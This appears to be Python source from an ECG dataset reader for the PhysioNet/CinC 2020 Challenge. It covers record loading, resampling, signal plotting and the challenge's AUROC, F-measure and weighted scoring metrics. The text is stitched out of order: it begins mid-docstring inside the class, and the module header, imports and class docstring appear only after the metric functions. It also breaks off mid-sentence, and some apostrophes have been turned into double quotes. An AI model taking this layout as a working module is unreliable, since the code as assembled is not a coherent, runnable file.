Returns ------- subject_info: dict, information about the subject, including "age", "sex", "medical_prescription", "history", "symptom_or_surgery", """ if items is None or len(items) == 0: info_items = [ "age", "sex", "medical_prescription", "history", "symptom_or_surgery", ] else: info_items = items ann_dict = self.load_ann(rec) subject_info = [ann_dict[item] for item in info_items] return subject_info def save_challenge_predictions(self, rec:str, output_dir:str, scores:List[Real], labels:List[int], classes:List[str]) -> NoReturn: """ NOT finished, NOT checked, need updating, TODO: update for the official phase Parameters ---------- rec: str, name of the record output_dir: str, directory to save the predictions scores: list of real, raw predictions labels: list of int, 0 or 1, binary predictions classes: list of str, SNOMED CT Code of binary predictions """ new_file = f"{rec}.csv" output_file = os.path.join(output_dir, new_file) # Include the filename as the recording number recording_string = f"#{rec}" class_string = ",".join(classes) label_string = ",".join(str(i) for i in labels) score_string = ",".join(str(i) for i in scores) with open(output_file, "w") as f: # f.write(recording_string + "\n" + class_string + "\n" + label_string + "\n" + score_string + "\n") f.write("\n".join([recording_string, class_string, label_string, score_string, ""])) def plot(self, rec:str, data:Optional[np.ndarray]=None, ann:Optional[Dict[str, np.ndarray]]=None, ticks_granularity:int=0, leads:Optional[Union[str, List[str]]]=None, same_range:bool=False, waves:Optional[Dict[str, Sequence[int]]]=None, **kwargs:Any) -> NoReturn: """ finished, checked, to improve, plot the signals of a record or external signals (units in μV), with metadata (fs, labels, tranche, etc.), possibly also along with wave delineations Parameters ---------- rec: str, name of the record data: ndarray, optional, (12-lead) ecg signal to plot, should be of the format "channel_first", and compatible with `leads` if given, data of `rec` will not be used, this is useful when plotting filtered data ann: dict, optional, annotations for `data`, with 2 items: "scored", "all", ignored if `data` is None ticks_granularity: int, default 0, the granularity to plot axis ticks, the higher the more, 0 (no ticks) --> 1 (major ticks) --> 2 (major + minor ticks) leads: str or list of str, optional, the leads to plot same_range: bool, default False, if True, forces all leads to have the same y range waves: dict, optional, indices of the wave critical points, including "p_onsets", "p_peaks", "p_offsets", "q_onsets", "q_peaks", "r_peaks", "s_peaks", "s_offsets", "t_onsets", "t_peaks", "t_offsets" kwargs: dict, TODO ---- 1. slice too long records, and plot separately for each segment 2. 
plot waves using `axvspan` NOTE ---- `Locator` of `plt` has default `MAXTICKS` equal to 1000, if not modifying this number, at most 40 seconds of signal could be plotted once Contributors: Jeethan, and WEN Hao """ tranche = self._get_tranche(rec) if tranche in "CDE": physionet_lightwave_suffix = CFG({ "C": "incartdb/1.0.0", "D": "ptbdb/1.0.0", "E": "ptb-xl/1.0.1", }) url = f"https://physionet.org/lightwave/?db={physionet_lightwave_suffix[tranche]}" print(f"better view: {url}") if "plt" not in dir(): import matplotlib.pyplot as plt plt.MultipleLocator.MAXTICKS = 3000 if leads is None or leads == "all": _leads = self.all_leads elif isinstance(leads, str): _leads = [leads] else: _leads = leads # assert all([l in self.all_leads for l in _leads]) assert set(_leads).issubset(self._all_leads_set) # lead_list = self.load_ann(rec)["df_leads"]["lead_name"].tolist() # lead_indices = [lead_list.index(l) for l in _leads] lead_indices = [self.all_leads.index(l) for l in _leads] if data is None: _data = self.load_data(rec, data_format="channel_first", units="μV")[lead_indices] else: units = self._auto_infer_units(data) print(f"input data is auto detected to have units in {units}") if units.lower() == "mv": _data = 1000 * data else: _data = data assert _data.shape[0] == len(_leads), \ f"number of leads from data of shape ({_data.shape[0]}) does not match the length ({len(_leads)}) of `leads`" if same_range: y_ranges = np.ones((_data.shape[0],)) * np.max(np.abs(_data)) + 100 else: y_ranges = np.max(np.abs(_data), axis=1) + 100 if waves: if waves.get("p_onsets", None) and waves.get("p_offsets", None): p_waves = [ [onset, offset] \ for onset, offset in zip(waves["p_onsets"], waves["p_offsets"]) ] elif waves.get("p_peaks", None): p_waves = [ [ max(0, p + ms2samples(PlotCfg.p_onset, fs=self.get_fs(rec))), min(_data.shape[1], p + ms2samples(PlotCfg.p_offset, fs=self.get_fs(rec))) ] for p in waves["p_peaks"] ] else: p_waves = [] if waves.get("q_onsets", None) and waves.get("s_offsets", None): qrs = [ [onset, offset] for onset, offset in zip(waves["q_onsets"], waves["s_offsets"]) ] elif waves.get("q_peaks", None) and waves.get("s_peaks", None): qrs = [ [ max(0, q + ms2samples(PlotCfg.q_onset, fs=self.get_fs(rec))), min(_data.shape[1], s + ms2samples(PlotCfg.s_offset, fs=self.get_fs(rec))) ] for q,s in zip(waves["q_peaks"], waves["s_peaks"]) ] elif waves.get("r_peaks", None): qrs = [ [ max(0, r + ms2samples(PlotCfg.qrs_radius, fs=self.get_fs(rec))), min(_data.shape[1], r + ms2samples(PlotCfg.qrs_radius, fs=self.get_fs(rec))) ] for r in waves["r_peaks"] ] else: qrs = [] if waves.get("t_onsets", None) and waves.get("t_offsets", None): t_waves = [ [onset, offset] for onset, offset in zip(waves["t_onsets"], waves["t_offsets"]) ] elif waves.get("t_peaks", None): t_waves = [ [ max(0, t + ms2samples(PlotCfg.t_onset, fs=self.get_fs(rec))), min(_data.shape[1], t + ms2samples(PlotCfg.t_offset, fs=self.get_fs(rec))) ] for t in waves["t_peaks"] ] else: t_waves = [] else: p_waves, qrs, t_waves = [], [], [] palette = {"p_waves": "green", "qrs": "red", "t_waves": "pink",} plot_alpha = 0.4 if ann is None or data is None: diag_scored = self.get_labels(rec, scored_only=True, fmt="a") diag_all = self.get_labels(rec, scored_only=False, fmt="a") else: diag_scored = ann["scored"] diag_all = ann["all"] nb_leads = len(_leads) seg_len = self.fs[tranche] * 25 # 25 seconds nb_segs = _data.shape[1] // seg_len t = np.arange(_data.shape[1]) / self.fs[tranche] duration = len(t) / self.fs[tranche] fig_sz_w = int(round(DEFAULT_FIG_SIZE_PER_SEC * 
duration)) fig_sz_h = 6 * np.maximum(y_ranges, 750) / 1500 fig, axes = plt.subplots(nb_leads, 1, sharex=False, figsize=(fig_sz_w, np.sum(fig_sz_h))) if nb_leads == 1: axes = [axes] for idx in range(nb_leads): axes[idx].plot(t, _data[idx], color="black", linewidth="2.0", label=f"lead - {_leads[idx]}") axes[idx].axhline(y=0, linestyle="-", linewidth="1.0", color="red") # NOTE that `Locator` has default `MAXTICKS` equal to 1000 if ticks_granularity >= 1: axes[idx].xaxis.set_major_locator(plt.MultipleLocator(0.2)) axes[idx].yaxis.set_major_locator(plt.MultipleLocator(500)) axes[idx].grid(which="major", linestyle="-", linewidth="0.4", color="red") if ticks_granularity >= 2: axes[idx].xaxis.set_minor_locator(plt.MultipleLocator(0.04)) axes[idx].yaxis.set_minor_locator(plt.MultipleLocator(100)) axes[idx].grid(which="minor", linestyle=":", linewidth="0.2", color="gray") # add extra info. to legend # https://stackoverflow.com/questions/16826711/is-it-possible-to-add-a-string-as-a-legend-item-in-matplotlib axes[idx].plot([], [], " ", label=f"labels_s - {",".join(diag_scored)}") axes[idx].plot([], [], " ", label=f"labels_a - {",".join(diag_all)}") axes[idx].plot([], [], " ", label=f"tranche - {self.tranche_names[tranche]}") axes[idx].plot([], [], " ", label=f"fs - {self.fs[tranche]}") for w in ["p_waves", "qrs", "t_waves"]: for itv in eval(w): axes[idx].axvspan(itv[0], itv[1], color=palette[w], alpha=plot_alpha) axes[idx].legend(loc="upper left", fontsize=14) axes[idx].set_xlim(t[0], t[-1]) axes[idx].set_ylim(min(-600, -y_ranges[idx]), max(600, y_ranges[idx])) axes[idx].set_xlabel("Time [s]", fontsize=16) axes[idx].set_ylabel("Voltage [μV]", fontsize=16) plt.subplots_adjust(hspace=0.05) fig.tight_layout() if kwargs.get("save_path", None): plt.savefig(kwargs["save_path"], dpi=200, bbox_inches="tight") else: plt.show() def get_tranche_class_distribution(self, tranches:Sequence[str], scored_only:bool=True) -> Dict[str, int]: """ finished, checked, Parameters ---------- tranches: sequence of str, tranche symbols (A-F) scored_only: bool, default True, only get class distributions that are scored in the CINC2020 official phase Returns ------- distribution: dict, keys are abbrevations of the classes, values are appearance of corr. classes in the tranche. """ tranche_names = [self.tranche_names[t] for t in tranches] df = dx_mapping_scored if scored_only else dx_mapping_all distribution = CFG() for _, row in df.iterrows(): num = (row[[tranche_names]].values).sum() if num > 0: distribution[row["Abbreviation"]] = num return distribution @staticmethod def get_arrhythmia_knowledge(arrhythmias:Union[str,List[str]], **kwargs) -> NoReturn: """ finished, checked, knowledge about ECG features of specific arrhythmias, Parameters ---------- arrhythmias: str, or list of str, the arrhythmia(s) to check, in abbreviations or in SNOMED CT Code """ if isinstance(arrhythmias, str): d = [normalize_class(arrhythmias)] else: d = [normalize_class(c) for c in arrhythmias] # pp = pprint.PrettyPrinter(indent=4) # unsupported = [item for item in d if item not in dx_mapping_all["Abbreviation"]] unsupported = [item for item in d if item not in dx_mapping_scored["Abbreviation"].values] assert len(unsupported) == 0, \ f"`{unsupported}` {"is" if len(unsupported)==1 else "are"} not supported!" 
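        # Hypothetical usage sketch (comments only; the `db_dir` path and the record
        # name "A0001" are placeholders), in the `>>>` style used by the class docstring:
        # >>> dr = CINC2020(db_dir="/path/to/cinc2020_data/")
        # >>> dr.plot("A0001", ticks_granularity=2, leads=["II", "V1"])  # 2 leads, major + minor grid
        # >>> dr.get_tranche_class_distribution(["A", "B"])  # scored-class counts in tranches A and B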
for idx, item in enumerate(d): # pp.pprint(eval(f"EAK.{item}")) print(dict_to_str(eval(f"EAK.{item}"))) if idx < len(d)-1: print("*"*110) def load_resampled_data(self, rec:str, data_format:str="channel_first", siglen:Optional[int]=None) -> np.ndarray: """ finished, checked, resample the data of `rec` to 500Hz, or load the resampled data in 500Hz, if the corr. data file already exists Parameters ---------- rec: str, name of the record data_format: str, default "channel_first", format of the ecg data, "channel_last" (alias "lead_last"), or "channel_first" (alias "lead_first") siglen: int, optional, signal length, units in number of samples, if set, signal with length longer will be sliced to the length of `siglen` used for example when preparing/doing model training Returns ------- data: ndarray, the resampled (and perhaps sliced) signal data """ tranche = self._get_tranche(rec) if siglen is None: rec_fp = os.path.join(self.db_dirs[tranche], f"{rec}_500Hz.npy") else: rec_fp = os.path.join(self.db_dirs[tranche], f"{rec}_500Hz_siglen_{siglen}.npy") if not os.path.isfile(rec_fp): # print(f"corresponding file {os.basename(rec_fp)} does not exist") data = self.load_data(rec, data_format="channel_first", units="mV", fs=None) if self.fs[tranche] != 500: data = resample_poly(data, 500, self.fs[tranche], axis=1) if siglen is not None and data.shape[1] >= siglen: # slice_start = (data.shape[1] - siglen)//2 # slice_end = slice_start + siglen # data = data[..., slice_start:slice_end] data = ensure_siglen(data, siglen=siglen, fmt="channel_first") np.save(rec_fp, data) elif siglen is None: np.save(rec_fp, data) else: # print(f"loading from local file...") data = np.load(rec_fp) if data_format.lower() in ["channel_last", "lead_last"]: data = data.T return data def load_raw_data(self, rec:str, backend:str="scipy") -> np.ndarray: """ finished, checked, load raw data from corresponding files with no further processing, in order to facilitate feeding data into the `run_12ECG_classifier` function Parameters ---------- rec: str, name of the record backend: str, default "scipy", the backend data reader, can also be "wfdb", note that "scipy" provides data in the format of "lead_first", while "wfdb" provides data in the format of "lead_last", Returns ------- raw_data: ndarray, raw data (d_signal) loaded from corresponding data file, without subtracting baseline nor dividing adc gain """ tranche = self._get_tranche(rec) if backend.lower() == "wfdb": rec_fp = self.get_data_filepath(rec, with_ext=False) wfdb_rec = wfdb.rdrecord(rec_fp, physical=False) raw_data = np.asarray(wfdb_rec.d_signal) elif backend.lower() == "scipy": rec_fp = self.get_data_filepath(rec, with_ext=True) raw_data = loadmat(rec_fp)["val"] return raw_data def _check_nan(self, tranches:Union[str, Sequence[str]]) -> NoReturn: """ finished, checked, check if records from `tranches` has nan values accessing data using `p_signal` of `wfdb` would produce nan values, if exceptionally large values are encountered, this could help detect abnormal records as well Parameters ---------- tranches: str or sequence of str, tranches to check """ for t in tranches: for rec in self.all_records[t]: data = self.load_data(rec) if np.isnan(data).any(): print(f"record {rec} from tranche {t} has nan values") from ..aux_data.cinc2020_aux_data import load_weights def compute_all_metrics(classes:List[str], truth:Sequence, binary_pred:Sequence, scalar_pred:Sequence) -> Tuple[float]: """ finished, checked, Parameters ---------- classes: list of str, list of all the classes, in 
the format of abbrevations truth: sequence, ground truth array, of shape (n_records, n_classes), with values 0 or 1 binary_pred: sequence, binary predictions, of shape (n_records, n_classes), with values 0 or 1 scalar_pred: sequence, probability predictions, of shape (n_records, n_classes), with values within [0,1] Returns ------- auroc: float, auprc: float, accuracy: float, f_measure: float, f_beta_measure: float, g_beta_measure: float, challenge_metric: float, """ # normal_class = "426783006" normal_class = "NSR" # equivalent_classes = [["713427006", "59118001"], ["284470004", "63593006"], ["427172004", "17338001"]] weights = load_weights(classes=classes) _truth = np.array(truth) _binary_pred = np.array(binary_pred) _scalar_pred = np.array(scalar_pred) print("- AUROC and AUPRC...") auroc, auprc = compute_auc(_truth, _scalar_pred) print("- Accuracy...") accuracy = compute_accuracy(_truth, _binary_pred) print("- F-measure...") f_measure = compute_f_measure(_truth, _binary_pred) print("- F-beta and G-beta measures...") f_beta_measure, g_beta_measure = compute_beta_measures(_truth, _binary_pred, beta=2) print("- Challenge metric...") challenge_metric = compute_challenge_metric(weights, _truth, _binary_pred, classes, normal_class) print("Done.") # Return the results. return auroc, auprc, accuracy, f_measure, f_beta_measure, g_beta_measure, challenge_metric # Compute recording-wise accuracy. def compute_accuracy(labels:np.ndarray, outputs:np.ndarray) -> float: """ checked, """ num_recordings, num_classes = np.shape(labels) num_correct_recordings = 0 for i in range(num_recordings): if np.all(labels[i, :]==outputs[i, :]): num_correct_recordings += 1 return float(num_correct_recordings) / float(num_recordings) # Compute confusion matrices. def compute_confusion_matrices(labels:np.ndarray, outputs:np.ndarray, normalize:bool=False) -> np.ndarray: """ checked, """ # Compute a binary confusion matrix for each class k: # # [TN_k FN_k] # [FP_k TP_k] # # If the normalize variable is set to true, then normalize the contributions # to the confusion matrix by the number of labels per recording. num_recordings, num_classes = np.shape(labels) if not normalize: A = np.zeros((num_classes, 2, 2)) for i in range(num_recordings): for j in range(num_classes): if labels[i, j]==1 and outputs[i, j]==1: # TP A[j, 1, 1] += 1 elif labels[i, j]==0 and outputs[i, j]==1: # FP A[j, 1, 0] += 1 elif labels[i, j]==1 and outputs[i, j]==0: # FN A[j, 0, 1] += 1 elif labels[i, j]==0 and outputs[i, j]==0: # TN A[j, 0, 0] += 1 else: # This condition should not happen. raise ValueError("Error in computing the confusion matrix.") else: A = np.zeros((num_classes, 2, 2)) for i in range(num_recordings): normalization = float(max(np.sum(labels[i, :]), 1)) for j in range(num_classes): if labels[i, j]==1 and outputs[i, j]==1: # TP A[j, 1, 1] += 1.0/normalization elif labels[i, j]==0 and outputs[i, j]==1: # FP A[j, 1, 0] += 1.0/normalization elif labels[i, j]==1 and outputs[i, j]==0: # FN A[j, 0, 1] += 1.0/normalization elif labels[i, j]==0 and outputs[i, j]==0: # TN A[j, 0, 0] += 1.0/normalization else: # This condition should not happen. raise ValueError("Error in computing the confusion matrix.") return A # Compute macro F-measure. 
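
# An illustrative, hypothetical self-check (the helper name and the toy arrays are
# made up for demonstration) of the per-class layout produced by
# `compute_confusion_matrices` above, namely A[k] == [[TN_k, FN_k], [FP_k, TP_k]],
# which the F-measure and F-beta/G-beta computations below read back as
# A[k, 1, 1] (TP), A[k, 1, 0] (FP), A[k, 0, 1] (FN), A[k, 0, 0] (TN).
def _toy_confusion_matrix_example() -> np.ndarray:
    """ hypothetical helper, for illustration only """
    # 3 recordings, 2 classes, binary multi-label ground truth and predictions
    labels = np.array([[1, 0],
                       [1, 1],
                       [0, 1]])
    outputs = np.array([[1, 1],
                        [0, 1],
                        [0, 1]])
    A = compute_confusion_matrices(labels, outputs)
    # class 0: TP=1, FP=0, FN=1, TN=1  ->  A[0] == [[1, 1], [0, 1]]
    # class 1: TP=2, FP=1, FN=0, TN=0  ->  A[1] == [[0, 0], [1, 2]]
    return A
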
def compute_f_measure(labels:np.ndarray, outputs:np.ndarray) -> float: """ checked, """ num_recordings, num_classes = np.shape(labels) A = compute_confusion_matrices(labels, outputs) f_measure = np.zeros(num_classes) for k in range(num_classes): tp, fp, fn, tn = A[k, 1, 1], A[k, 1, 0], A[k, 0, 1], A[k, 0, 0] if 2 * tp + fp + fn: f_measure[k] = float(2 * tp) / float(2 * tp + fp + fn) else: f_measure[k] = float("nan") macro_f_measure = np.nanmean(f_measure) return macro_f_measure # Compute F-beta and G-beta measures from the unofficial phase of the Challenge. def compute_beta_measures(labels:np.ndarray, outputs:np.ndarray, beta:Real) -> Tuple[float, float]: """ checked, """ num_recordings, num_classes = np.shape(labels) A = compute_confusion_matrices(labels, outputs, normalize=True) f_beta_measure = np.zeros(num_classes) g_beta_measure = np.zeros(num_classes) for k in range(num_classes): tp, fp, fn, tn = A[k, 1, 1], A[k, 1, 0], A[k, 0, 1], A[k, 0, 0] if (1+beta**2)*tp + fp + beta**2*fn: f_beta_measure[k] = float((1+beta**2)*tp) / float((1+beta**2)*tp + fp + beta**2*fn) else: f_beta_measure[k] = float("nan") if tp + fp + beta*fn: g_beta_measure[k] = float(tp) / float(tp + fp + beta*fn) else: g_beta_measure[k] = float("nan") macro_f_beta_measure = np.nanmean(f_beta_measure) macro_g_beta_measure = np.nanmean(g_beta_measure) return macro_f_beta_measure, macro_g_beta_measure # Compute macro AUROC and macro AUPRC. def compute_auc(labels:np.ndarray, outputs:np.ndarray) -> Tuple[float, float]: """ checked, """ num_recordings, num_classes = np.shape(labels) # Compute and summarize the confusion matrices for each class across at distinct output values. auroc = np.zeros(num_classes) auprc = np.zeros(num_classes) for k in range(num_classes): # We only need to compute TPs, FPs, FNs, and TNs at distinct output values. thresholds = np.unique(outputs[:, k]) thresholds = np.append(thresholds, thresholds[-1]+1) thresholds = thresholds[::-1] num_thresholds = len(thresholds) # Initialize the TPs, FPs, FNs, and TNs. tp = np.zeros(num_thresholds) fp = np.zeros(num_thresholds) fn = np.zeros(num_thresholds) tn = np.zeros(num_thresholds) fn[0] = np.sum(labels[:, k]==1) tn[0] = np.sum(labels[:, k]==0) # Find the indices that result in sorted output values. idx = np.argsort(outputs[:, k])[::-1] # Compute the TPs, FPs, FNs, and TNs for class k across thresholds. i = 0 for j in range(1, num_thresholds): # Initialize TPs, FPs, FNs, and TNs using values at previous threshold. tp[j] = tp[j-1] fp[j] = fp[j-1] fn[j] = fn[j-1] tn[j] = tn[j-1] # Update the TPs, FPs, FNs, and TNs at i-th output value. while i < num_recordings and outputs[idx[i], k] >= thresholds[j]: if labels[idx[i], k]: tp[j] += 1 fn[j] -= 1 else: fp[j] += 1 tn[j] -= 1 i += 1 # Summarize the TPs, FPs, FNs, and TNs for class k. tpr = np.zeros(num_thresholds) tnr = np.zeros(num_thresholds) ppv = np.zeros(num_thresholds) for j in range(num_thresholds): if tp[j] + fn[j]: tpr[j] = float(tp[j]) / float(tp[j] + fn[j]) else: tpr[j] = float("nan") if fp[j] + tn[j]: tnr[j] = float(tn[j]) / float(fp[j] + tn[j]) else: tnr[j] = float("nan") if tp[j] + fp[j]: ppv[j] = float(tp[j]) / float(tp[j] + fp[j]) else: ppv[j] = float("nan") # Compute AUROC as the area under a piecewise linear function with TPR/ # sensitivity (x-axis) and TNR/specificity (y-axis) and AUPRC as the area # under a piecewise constant with TPR/recall (x-axis) and PPV/precision # (y-axis) for class k. 
    for j in range(num_thresholds-1):
        auroc[k] += 0.5 * (tpr[j+1] - tpr[j]) * (tnr[j+1] + tnr[j])
        auprc[k] += (tpr[j+1] - tpr[j]) * ppv[j+1]

    # Compute macro AUROC and macro AUPRC across classes.
    macro_auroc = np.nanmean(auroc)
    macro_auprc = np.nanmean(auprc)

    return macro_auroc, macro_auprc


# Compute modified confusion matrix for multi-class, multi-label tasks.
def compute_modified_confusion_matrix(labels:np.ndarray, outputs:np.ndarray) -> np.ndarray:
    """ checked,

    Compute a binary multi-class, multi-label confusion matrix, where the rows
    are the labels and the columns are the outputs.
    """
    num_recordings, num_classes = np.shape(labels)
    A = np.zeros((num_classes, num_classes))

    # Iterate over all of the recordings.
    for i in range(num_recordings):
        # Calculate the number of positive labels and/or outputs.
        normalization = float(max(np.sum(np.any((labels[i, :], outputs[i, :]), axis=0)), 1))
        # Iterate over all of the classes.
        for j in range(num_classes):
            # Assign full and/or partial credit for each positive class.
            if labels[i, j]:
                for k in range(num_classes):
                    if outputs[i, k]:
                        A[j, k] += 1.0/normalization
    return A


# Compute the evaluation metric for the Challenge.
def compute_challenge_metric(weights:np.ndarray, labels:np.ndarray, outputs:np.ndarray, classes:List[str], normal_class:str) -> float:
    """ checked,
    """
    num_recordings, num_classes = np.shape(labels)
    normal_index = classes.index(normal_class)

    # Compute the observed score.
    A = compute_modified_confusion_matrix(labels, outputs)
    observed_score = np.nansum(weights * A)

    # Compute the score for the model that always chooses the correct label(s).
    correct_outputs = labels
    A = compute_modified_confusion_matrix(labels, correct_outputs)
    correct_score = np.nansum(weights * A)

    # Compute the score for the model that always chooses the normal class.
    inactive_outputs = np.zeros((num_recordings, num_classes), dtype=bool)
    inactive_outputs[:, normal_index] = 1
    A = compute_modified_confusion_matrix(labels, inactive_outputs)
    inactive_score = np.nansum(weights * A)

    if correct_score != inactive_score:
        normalized_score = float(observed_score - inactive_score) / float(correct_score - inactive_score)
    else:
        normalized_score = 0.0

    return normalized_score


# alias
compute_metrics = compute_challenge_metric
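
# An illustrative, hypothetical example (class names, weight matrix and label arrays
# below are made up; real weights come from `load_weights`) of how the challenge
# metric is normalized: a perfect classifier scores 1.0, while always predicting
# the normal class scores 0.0.
def _toy_challenge_metric_example() -> Tuple[float, float]:
    """ hypothetical helper, for illustration only """
    classes = ["NSR", "AF", "PVC"]
    normal_class = "NSR"
    # full credit on the diagonal, partial credit for confusing AF with PVC
    weights = np.array([
        [1.0, 0.0, 0.0],
        [0.0, 1.0, 0.3],
        [0.0, 0.3, 1.0],
    ])
    labels = np.array([
        [1, 0, 0],
        [0, 1, 0],
        [0, 1, 1],
        [0, 0, 1],
    ])
    perfect = compute_challenge_metric(weights, labels, labels, classes, normal_class)  # 1.0
    always_normal = np.zeros_like(labels)
    always_normal[:, classes.index(normal_class)] = 1
    baseline = compute_challenge_metric(weights, labels, always_normal, classes, normal_class)  # 0.0
    return perfect, baseline
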
# -*- coding: utf-8 -*- """ """ import os, io, sys import re import json import time # import pprint from copy import deepcopy from datetime import datetime from typing import Union, Optional, Any, List, Dict, Tuple, Set, Sequence, NoReturn from numbers import Real, Number import numpy as np np.set_printoptions(precision=5, suppress=True) import pandas as pd import wfdb from scipy.io import loadmat from scipy.signal import resample, resample_poly from ...cfg import CFG from ...utils.misc import ( get_record_list_recursive, get_record_list_recursive3, ms2samples, dict_to_str, ensure_siglen, ) from ...utils import ecg_arrhythmia_knowledge as EAK from ..aux_data.cinc2020_aux_data import ( dx_mapping_all, dx_mapping_scored, dx_mapping_unscored, normalize_class, abbr_to_snomed_ct_code, df_weights_abbr, equiv_class_dict, ) from ..base import PhysioNetDataBase, DEFAULT_FIG_SIZE_PER_SEC __all__ = [ "CINC2020", "compute_metrics", "compute_all_metrics", ] # configurations for visualization PlotCfg = CFG() # default const for the plot function in dataset.py # used only when corr. values are absent # all values are time bias w.r.t. corr. peaks, with units in ms PlotCfg.p_onset = -40 PlotCfg.p_offset = 40 PlotCfg.q_onset = -20 PlotCfg.s_offset = 40 PlotCfg.qrs_radius = 60 PlotCfg.t_onset = -100 PlotCfg.t_offset = 60 class CINC2020(PhysioNetDataBase): """ finished, under improving, Classification of 12-lead ECGs: the PhysioNet/Computing in Cardiology Challenge 2020 ABOUT CINC2020 -------------- 0. There are 6 difference tranches of training data, listed as follows: A. 6,877 recordings from China Physiological Signal Challenge in 2018 (CPSC2018): PhysioNetChallenge2020_Training_CPSC.tar.gz in ref. [6] B. 3,453 recordings from China 12-Lead ECG Challenge Database (unused data from CPSC2018 and NOT the CPSC2018 test data): PhysioNetChallenge2020_Training_2.tar.gz in ref. [6] C. 74 recordings from the St Petersburg INCART 12-lead Arrhythmia Database: PhysioNetChallenge2020_Training_StPetersburg.tar.gz in ref. [6] D. 516 recordings from the PTB Diagnostic ECG Database: PhysioNetChallenge2020_Training_PTB.tar.gz in ref. [6] E. 21,837 recordings from the PTB-XL electrocardiography Database: PhysioNetChallenge2020_PTB-XL.tar.gz in ref. [6] F. 10,344 recordings from a Georgia 12-Lead ECG Challenge Database: PhysioNetChallenge2020_Training_E.tar.gz in ref. [6] In total, 43,101 labeled recordings of 12-lead ECGs from four countries (China, Germany, Russia, and the USA) across 3 continents have been posted publicly for this Challenge, with approximately the same number hidden for testing, representing the largest public collection of 12-lead ECGs 1. the A tranche training data comes from CPSC2018, whose folder name is `Training_WFDB`. The B tranche training data are unused training data of CPSC2018, having folder name `Training_2`. For these 2 tranches, ref. the docstring of `database_reader.cpsc_databases.cpsc2018.CPSC2018` 2. C. D. E. tranches of training data all come from corresponding PhysioNet dataset, whose details can be found in corresponding files: C: database_reader.physionet_databases.incartdb.INCARTDB D: database_reader.physionet_databases.ptbdb.PTBDB E: database_reader.physionet_databases.ptb_xl.PTB_XL the C tranche has folder name `Training_StPetersburg`, the D tranche has folder name `Training_PTB`, the F tranche has folder name `WFDB` 3. the F tranche is entirely new, posted for this Challenge, and represents a unique demographic of the Southeastern United States. 
It has folder name `Training_E/WFDB`. 4. only a part of diagnosis_abbr (diseases that appear in the labels of the 6 tranches of training data) are used in the scoring function (ref. `dx_mapping_scored_cinc2020`), while others are ignored (ref. `dx_mapping_unscored_cinc2020`). The scored diagnoses were chosen based on prevalence of the diagnoses in the training data, the severity of the diagnoses, and the ability to determine the diagnoses from ECG recordings. The ignored diagnosis_abbr can be put in a a "non-class" group. 5. the (updated) scoring function has a scoring matrix with nonzero off-diagonal elements. This scoring function reflects the clinical reality that some misdiagnoses are more harmful than others and should be scored accordingly. Moreover, it reflects the fact that confusing some classes is much less harmful than confusing other classes. 6. sampling frequencies: A. (CPSC2018): 500 Hz B. (CPSC2018-2): 500 Hz C. (INCART): 257 Hz D. (PTB): 1000 Hz E. (PTB-XL): 500 Hz F. (Georgia): 500 Hz 7. all data are recorded in the leads ordering of ["I", "II", "III", "aVR", "aVL", "aVF", "V1", "V2", "V3", "V4", "V5", "V6"] using for example the following code: >>> db_dir = "/media/cfs/wenhao71/data/cinc2020_data/" >>> working_dir = "./working_dir" >>> dr = CINC2020Reader(db_dir=db_dir,working_dir=working_dir) >>> set_leads = [] >>> for tranche, l_rec in dr.all_records.items(): ... for rec in l_rec: ... ann = dr.load_ann(rec) ... leads = ann["df_leads"]["lead_name"].values.tolist() ... if leads not in set_leads: ... set_leads.append(leads) NOTE ---- 1. The datasets have been roughly processed to have a uniform format, hence differ from their original resource (e.g. differe in sampling frequency, sample duration, etc.) 2. The original datasets might have richer metadata (especially those from PhysioNet), which can be fetched from corresponding reader's docstring or website of the original source 3. Each sub-dataset might have its own organizing scheme of data, which should be carefully dealt with 4. There are few "absolute" diagnoses in 12 lead ECGs, where large discrepancies in the interpretation of the ECG can be found even inspected by experts. There is inevitably something lost in translation, especially when you do not have the context. This doesn"t mean making an algorithm isn't important 5. The labels are noisy, which one has to deal with in all real world data 6. each line of the following classes are considered the same (in the scoring matrix): - RBBB, CRBBB (NOT including IRBBB) - PAC, SVPB - PVC, VPB 7. unfortunately, the newly added tranches (C - F) have baseline drift and are much noisier. In contrast, CPSC data have had baseline removed and have higher SNR 8. on Aug. 1, 2020, adc gain (including "resolution", "ADC"? in .hea files) of datasets INCART, PTB, and PTB-xl (tranches C, D, E) are corrected. After correction, (the .tar files of) the 3 datasets are all put in a "WFDB" subfolder. In order to keep the structures consistant, they are moved into "Training_StPetersburg", "Training_PTB", "WFDB" as previously. Using the following code, one can check the adc_gain and baselines of each tranche: >>> db_dir = "/media/cfs/wenhao71/data/cinc2020_data/" >>> working_dir = "./working_dir" >>> dr = CINC2020(db_dir=db_dir,working_dir=working_dir) >>> resolution = {tranche: set() for tranche in "ABCDEF"} >>> baseline = {tranche: set() for tranche in "ABCDEF"} >>> for tranche, l_rec in dr.all_records.items(): ... for rec in l_rec: ... ann = dr.load_ann(rec) ... 
resolution[tranche] = resolution[tranche].union(set(ann["df_leads"]["adc_gain"])) ... baseline[tranche] = baseline[tranche].union(set(ann["df_leads"]["baseline"])) >>> print(resolution, baseline) {"A": {1000.0}, "B": {1000.0}, "C": {1000.0}, "D": {1000.0}, "E": {1000.0}, "F": {1000.0}} {"A": {0}, "B": {0}, "C": {0}, "D": {0}, "E": {0}, "F": {0}} 9. the .mat files all contain digital signals, which has to be converted to physical values using adc gain, basesline, etc. in corresponding .hea files. `wfdb.rdrecord` has already done this conversion, hence greatly simplifies the data loading process. NOTE that there"s a difference when using `wfdb.rdrecord`: data from `loadmat` are in "channel_first" format, while `wfdb.rdrecord.p_signal` produces data in the "channel_last" format 10. there"re 3 equivalent (2 classes are equivalent if the corr. value in the scoring matrix is 1): (RBBB, CRBBB), (PAC, SVPB), (PVC, VPB) 11. in the newly (Feb., 2021) created dataset (ref. [7]), header files of each subset were gathered into one separate compressed file. This is due to the fact that updates on the dataset are almost always done in the header files. The correct usage of ref. [7], after uncompressing, is replacing the header files in the folder `All_training_WFDB` by header files from the 6 folders containing all header files from the 6 subsets. ISSUES ------ 1. reading the .hea files, baselines of all records are 0, however it is not the case if one plot the signal 2. about half of the LAD records satisfy the "2-lead" criteria, but fail for the "3-lead" criteria, which means that their axis is (-30°, 0°) which is not truely LAD 3. (Aug. 15, 2020; resolved, and changed to 1000) tranche F, the Georgia subset, has ADC gain 4880 which might be too high. Thus obtained voltages are too low. 1000 might be a suitable (correct) value of ADC gain for this tranche just as the other tranches. 4. "E04603" (all leads), "E06072" (chest leads, epecially V1-V3), "E06909" (lead V2), "E07675" (lead V3), "E07941" (lead V6), "E08321" (lead V6) has exceptionally large values at rpeaks, reading (`load_data`) these two records using `wfdb` would bring in 